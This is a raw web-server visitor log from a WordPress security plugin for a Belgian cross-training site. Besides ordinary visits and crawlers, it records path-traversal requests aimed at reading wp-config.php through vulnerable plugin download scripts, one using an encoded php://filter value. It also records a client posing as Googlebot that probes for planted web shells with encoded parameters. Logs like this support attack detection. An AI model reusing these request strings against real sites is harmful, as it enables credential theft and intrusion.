(71881, 1494328369.109345, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71882, 1494328417.418574, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71883, 1494328450.655340, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71884, 1494328470.647379, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71885, 1494328513.498491, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71886, 1494328720.915553, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71887, 1494328730.458054, 3259896531, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71888, 1494329619.631189, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71889, 1494330934.928095, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71890, 1494335390.325136, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71891, 1494337130.377995, 856638340, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(71892, 1494337216.988258, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71893, 1494338118.698062, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71894, 1494340481.253968, 1569621950, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G930F Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/122.0.0.17.71;]'),
(71895, 1494341010.385625, 3024883617, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71896, 1494344260.655585, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71897, 1494346869.157721, 2328459013, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(71898, 1494346869.597588, 2328459013, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', ''),
(71899, 1494350392.879759, 3024883482, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71900, 1494350394.707279, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(71901, 1494350577.895421, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/awake/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71902, 1494350588.335030, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71903, 1494351365.077669, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71904, 1494353414.909007, 3652617392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71905, 1494355051.776424, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/infocus2/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71906, 1494355638.829614, 1358487954, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71907, 1494355640.806940, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71908, 1494355642.194871, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71909, 1494355644.461121, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71910, 1494355645.903417, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71911, 1494355645.981722, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71912, 1494355646.019835, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71913, 1494355647.637920, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71914, 1494355647.651102, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71915, 1494355647.667523, 1358487954, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(71916, 1494357438.345704, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71917, 1494357439.226365, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71918, 1494357439.647562, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71919, 1494357440.213307, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71920, 1494357440.672254, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71921, 1494357441.078772, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71922, 1494357441.480090, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71923, 1494357441.922885, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71924, 1494357442.334161, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71925, 1494357442.746395, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71926, 1494357443.152073, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71927, 1494357443.623580, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71928, 1494357444.047953, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71929, 1494357444.473649, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71930, 1494357905.721845, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71931, 1494358982.373459, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71932, 1494360536.066064, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/echelon/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71933, 1494362851.320540, 1374781696, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),
(71934, 1494363149.831612, 1374781696, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),
(71935, 1494363207.545595, 1374781696, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),
(71936, 1494363233.044515, 1374781696, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),
(71937, 1494364430.499013, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71938, 1494364903.217807, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71939, 1494368179.012744, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71940, 1494368590.524850, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/xxu.php', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(71941, 1494368591.557174, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/x.php', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(71942, 1494368592.758804, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71943, 1494368613.127669, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71944, 1494368626.734486, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/sqlbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71945, 1494368644.964209, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/sqlbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71946, 1494368657.099509, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/email.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71947, 1494368673.605138, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/email.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71948, 1494368678.149470, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/functions.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71949, 1494368685.252140, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/functions.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71950, 1494368699.699097, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/logs.asp?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71951, 1494368709.009737, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/logs.asp?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71952, 1494368719.758538, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71953, 1494368728.775791, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71954, 1494368739.130220, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71955, 1494368746.170995, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71956, 1494368768.192823, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/shootme.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71957, 1494368779.875524, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/shootme.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71958, 1494368803.199631, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configurationbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71959, 1494368822.198456, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configurationbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71960, 1494368841.124662, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71961, 1494368864.579340, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71962, 1494368865.803836, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/jconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71963, 1494368888.708721, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/jconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71964, 1494368901.080875, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/reads.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71965, 1494368917.322634, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/myriad/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71966, 1494368925.386099, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/reads.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71967, 1494368944.688864, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71968, 1494368964.656754, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71969, 1494368988.028553, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71970, 1494369011.599698, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71971, 1494369044.161348, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/laj.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71972, 1494369048.549251, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71973, 1494369062.816608, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71974, 1494369079.718731, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71975, 1494369089.584322, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71976, 1494369109.436128, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71977, 1494369127.892073, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/media/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71978, 1494369172.835308, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/r3x.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71979, 1494369187.742672, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/r3x.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71980, 1494369205.285424, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71981, 1494369226.875587, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71982, 1494369240.393498, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/0day.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71983, 1494369246.832530, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/0day.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71984, 1494369259.833231, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes/u2p.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2luY2x1ZGVzLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71985, 1494369270.156133, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes/u2p.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2luY2x1ZGVzLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
